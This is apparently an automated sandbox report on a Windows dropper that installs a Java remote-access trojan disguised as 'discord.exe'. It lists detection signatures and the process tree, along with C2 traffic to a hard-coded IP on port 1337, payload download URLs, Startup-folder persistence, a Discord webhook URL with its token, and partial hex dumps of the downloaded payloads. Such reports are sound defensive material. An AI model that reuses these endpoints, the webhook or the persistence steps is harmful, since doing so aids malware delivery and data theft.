Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uBZeAVcb6r.exe

Overview

General Information

Sample Name:uBZeAVcb6r.exe
Analysis ID:798176
MD5:a5a4b316cc349db892a27c9b5429dd4e
SHA1:18e025e751a08d3af69bf8fbe26939bfa96c1668
SHA256:3065df9608a4d29f1cc7f4934ecd7445d83f6e5ecde5b7f8ecca656a7c384657
Tags:exe
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Drops PE files to the startup folder
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses cacls to modify the permissions of files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Contains functionality to detect virtual machines (SLDT)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • uBZeAVcb6r.exe (PID: 5956 cmdline: C:\Users\user\Desktop\uBZeAVcb6r.exe MD5: A5A4B316CC349DB892A27C9B5429DD4E)
    • javaw.exe (PID: 6120 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
      • icacls.exe (PID: 5144 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 5156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • discord.exe (PID: 4872 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe" MD5: 94CCB92B775297F357670ABD1E6F754B)
    • javaw.exe (PID: 5524 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • discord.exe (PID: 5824 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe" MD5: 94CCB92B775297F357670ABD1E6F754B)
    • javaw.exe (PID: 5212 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • discord.exe (PID: 648 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe" MD5: 94CCB92B775297F357670ABD1E6F754B)
    • javaw.exe (PID: 4520 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

Timestamp:192.168.2.323.94.99.1194968613372853043 02/03/23-20:38:56.354509
SID:2853043
Source Port:49686
Destination Port:1337
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:23.94.99.119192.168.2.31337496862853042 02/03/23-20:38:54.878115
SID:2853042
Source Port:1337
Destination Port:49686
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.323.94.99.1194968613372853044 02/03/23-20:37:38.110801
SID:2853044
Source Port:49686
Destination Port:1337
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: uBZeAVcb6r.exeVirustotal: Detection: 12%Perma Link
Antivirus detection for URL or domain
Source: http://23.94.99.119/discord.exeAvira URL Cloud: Label: malware
Source: http://23.94.99.119/discord.jarAvira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeAvira: detection malicious, Label: HEUR/AGEN.1217604
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeAvira: detection malicious, Label: HEUR/AGEN.1217604
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeReversingLabs: Detection: 28%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49685 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49688 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:49690 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49692 version: TLS 1.2
Source: uBZeAVcb6r.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\akate\source\repos\MAHAServer\MAHA\obj\Debug\discord.pdb source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000000.257397775.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp, discord.exe, 00000009.00000002.526982695.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000000.288794491.0000000000C42000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Users\akate\source\repos\MAHAServer\MAHA\obj\Debug\discord.pdbR source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000000.288794491.0000000000C42000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2853044 ETPRO TROJAN Java/Adwind Variant CnC Activity 192.168.2.3:49686 -> 23.94.99.119:1337
Source: TrafficSnort IDS: 2853042 ETPRO TROJAN Java/Adwind Variant CnC Activity 23.94.99.119:1337 -> 192.168.2.3:49686
Source: TrafficSnort IDS: 2853043 ETPRO TROJAN Java/Adwind Variant Checkin 192.168.2.3:49686 -> 23.94.99.119:1337
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /discord.exe HTTP/1.1Host: 23.94.99.119Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /discord.jar HTTP/1.1Host: 23.94.99.119
Source: global trafficHTTP traffic detected: GET /discord.exe HTTP/1.1Host: 23.94.99.119Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Feb 2023 19:37:27 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0Last-Modified: Mon, 30 Jan 2023 14:08:02 GMTETag: "7800-5f37bbe46bd01"Accept-Ranges: bytesContent-Length: 30720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 69 01 d9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6e 00 00 00 08 00 00 00 00 00 00 7e 8c 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2a 8c 00 00 4f 00 00 00 00 a0 00 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 98 8b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 6c 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 a0 00 00 00 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 8c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 29 00 00 d4 1c 00 00 03 00 02 00 13 00 00 06 68 46 00 00 30 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 19 00 00 0a 00 00 2a 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 02 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 73 1c 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 01 00 0b 00 00 00 03 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 06 00 00 06 28 1e 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a ce 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 11 00 00 06 00 02 7b 08 00 00 04 25 6f 20 00 00 0a 72 3b 00 00 70 28 21 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 0a 00 2a ba 00 72 75 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 8f 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a ba 00 72 ab 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Feb 2023 19:37:45 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0Last-Modified: Mon, 30 Jan 2023 14:08:02 GMTETag: "7800-5f37bbe46bd01"Accept-Ranges: bytesContent-Length: 30720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 69 01 d9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6e 00 00 00 08 00 00 00 00 00 00 7e 8c 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2a 8c 00 00 4f 00 00 00 00 a0 00 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 98 8b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 6c 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 a0 00 00 00 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 8c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 29 00 00 d4 1c 00 00 03 00 02 00 13 00 00 06 68 46 00 00 30 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 19 00 00 0a 00 00 2a 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 02 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 73 1c 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 01 00 0b 00 00 00 03 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 06 00 00 06 28 1e 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a ce 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 11 00 00 06 00 02 7b 08 00 00 04 25 6f 20 00 00 0a 72 3b 00 00 70 28 21 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 0a 00 2a ba 00 72 75 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 8f 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a ba 00 72 ab 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 2
Source: global trafficTCP traffic: 192.168.2.3:49686 -> 23.94.99.119:1337
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Feb 2023 19:37:28 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0Last-Modified: Thu, 26 Jan 2023 03:05:11 GMTETag: "9feb5-5f32204607ff8"Accept-Ranges: bytesContent-Length: 655029Content-Type: application/java-archiveData Raw: 50 4b 03 04 14 00 08 08 08 00 a5 98 39 56 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 49 6c 49 49 6c 4c 6c 6c 49 2f 6c 6c 6c 49 6c 49 6c 49 6c 6c 6c 2f 49 49 6c 6c 6c 6c 6c 49 6c 49 49 6c 2f 6c 49 6c 49 6c 49 49 6c 6c 49 2f 49 49 6c 6c 49 6c 6c 6c 6c 49 49 6c 49 49 49 49 2e 63 6c 61 73 73 d5 3c 07 40 14 47 d7 b3 fb 0e 0e 8e 03 d6 5b 16 59 50 44 44 a4 0a 2a 2e 78 d8 10 44 0f 10 0b ab 02 56 44 04 04 01 01 0b 4a d4 58 63 4c 8f 31 31 cd 96 c4 98 98 c4 44 83 18 13 4b 8a 26 c6 24 a6 1b a3 29 98 de 13 d3 1b ff 9b d9 bd 42 b1 e7 fb f2 fd 78 f7 76 df ec cc 6b f3 de cc bc d9 39 8f fc fd c4 3e 42 48 82 41 e2 c8 40 5b b9 cd 56 9e 55 5e 6e 8b 2b 47 c0 fe 95 97 c7 d9 28 64 b8 ad 3c 4e 2b b6 d1 3a 0c b2 27 b4 c4 66 33 12 8e 23 c2 cc 82 b9 05 71 e5 05 15 c5 71 23 a7 cd 2c 2a ac 35 12 c0 52 5a d5 66 b3 b7 2d b7 71 64 40 d6 45 72 d3 d8 68 64 92 39 e2 63 d3 2a 69 35 90 a0 38 21 cb c9 3b a7 b6 ba b4 a2 98 56 d3 04 b4 e9 64 38 c2 d9 60 72 70 f1 19 fa c4 66 97 9d 92 e0 88 21 22 72 c2 10 8e f8 6a 35 6d ba 6e e5 1c 49 8a 70 a1 9c 5a 5e 50 53 93 9c d5 5a cd 64 5b 64 db 32 8e f4 ee af 5a db 96 0f 6c 43 b0 7f d4 c0 64 55 4d 8e c4 2f 47 42 9c 0f 51 86 a2 e2 82 f2 94 c2 c2 a2 9a 9a a1 f3 0b 8b aa 6a 4b 2b 2b 8c a4 03 47 02 9d b5 c6 cc a9 a8 2d 9d 55 e4 f2 5c 44 7b b0 e7 a5 95 71 b6 91 2e 0f 24 a8 e8 f1 c8 56 98 16 9b 93 66 26 9e c4 e4 49 78 22 43 71 ff 9d 2f 42 f7 93 d3 12 38 32 f8 62 9d c0 66 ef d9 72 ad c8 48 3a d3 0e b7 77 8c 4e 81 23 89 17 62 c5 7c bb 19 e7 d4 96 96 c7 65 95 d6 d4 26 9b 49 17 12 62 22 c1 a4 2b f6 59 cb 67 46 d2 8d 23 1e a5 b5 45 d5 05 b5 95 d5 1c f1 8f 70 6d 6d d3 cb 91 42 77 12 ee 45 c2 48 0f e8 9d 38 61 13 76 71 2b 41 8c 24 8a 23 96 b6 2d 8d 24 86 23 c6 92 82 9a ec a2 f9 b5 1c 81 88 c8 7c 33 e9 49 e2 bc 48 2c 89 87 d0 c4 ad 1d d1 6b 2a d8 33 bf 88 76 fa df 4c fa 90 04 5a b9 2f 47 3a 3a 9f 56 17 cd 28 c7 c7 71 e9 a5 45 e5 d3 8d 24 11 ca b7 de 5d 0b 09 bd 17 e6 62 af 69 76 b6 3b 26 bb e1 48 4f 57 db b5 68 de d2 ef 74 b7 37 93 64 d2 9f 9a 6c 00 e4 97 1d 29 31 13 37 e2 4e 3b 7a 30 94 dc 66 f5 e7 48 f2 65 84 9e 91 a4 a2 b6 7a e0 e9 d1 ac 3d 42 13 46 b4 e8 be 11 05 55 28 ca 50 92 6e 22 69 64 18 47 bc 5b 3c 32 12 6c e1 55 58 59 51 5b 50 5a 51 93 59 54 c7 11 29 a2 ad 0d a9 c9 33 49 96 17 c9 20 23 20 23 7f 11 8e 26 c6 e2 a2 5a b5 ae aa 08 ad d5 c2 ea 9a 53 99 c9 28 32 da 44 92 c8 18 08 7d 3a 0d 87 35 c0 ea 1c 09 6f 8f 76 7b 5d 36 96 8c a3 cc c6 43 67 ef d7 83 39 d2 41 d7 d1 69 03 8e 8c 3e a7 2b b7 ec 9f 0b 1b 29 cc 24 9f 4c 30 61 17 4d 44 79 6b a8 bc 3d da 91 b7 1d 0d c6 99 c9 64 32 85 aa 3b 15 7c 3b 1b c2 21 27 ec a0 0a 83 ae 79 3b 8a 82 5e 14 74 87 84 ed 1e 23 61 92 4f 6e 09 47 dc fb 97 56 94 d6 0e 64 ce 8c 6d 4b c9 4c 13 b1 90 32 c8 b8 a3 ff 2f 2d 46 6f cd 95 8c a4 02 82 0e bf f
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.000000000319D000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.000000000308E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.99.119
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.0000000003141000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.0000000003031000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000000.288794491.0000000000C42000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://23.94.99.119/discord.exe
Source: uBZeAVcb6r.exe, 00000000.00000000.257397775.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://23.94.99.119/discord.exeu/Microsoft/Windows/Start
Source: uBZeAVcb6r.exe, 00000000.00000000.257397775.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp, uBZeAVcb6r.exe, 00000000.00000002.527196154.0000000003141000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.0000000003031000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000000.288794491.0000000000C42000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://23.94.99.119/discord.jar
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.000000000319D000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.000000000308E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.99.1194
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.99.119D8
Source: javaw.exe, 00000001.00000002.530479660.000000000A5D5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://canary.discord.com
Source: javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
